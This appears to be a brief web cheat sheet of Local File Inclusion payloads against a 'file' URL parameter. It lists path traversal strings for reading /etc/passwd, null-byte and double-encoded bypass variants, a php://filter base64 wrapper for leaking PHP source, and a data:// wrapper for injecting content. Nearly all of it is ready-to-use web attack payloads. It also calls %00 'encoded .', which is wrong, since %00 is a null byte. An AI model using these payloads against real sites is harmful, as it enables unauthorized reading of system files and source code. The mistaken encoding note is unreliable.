Skip to content

LFI

  • ?file=/etc/passwd
  • ?file=../../../../../../etc/passwd
  • ?file=../../../../../../etc/passwd%00
    • %00 = encoded .
  • ?file=....//....//....//....//etc/passwd
  • ?file=%252e%252e%252fetc%252fpasswd
    • Double encoded: %252e%252e%252fetc%252fpasswd = encoded %2e%2e%2fetc%2fpasswd = encoded ../etc/passwd
  • ?file=php://filter/convert.base64-encode/resource=/etc/passwd
    • loads the content of the file and encodes it as base64 which allows us to get the content without php is interpreting it. Good to get php file content.
  • ?file=data://text/plain;base64,QW9DMyBpcyBmdW4hCg==
    • Give the php the file to load as data stream.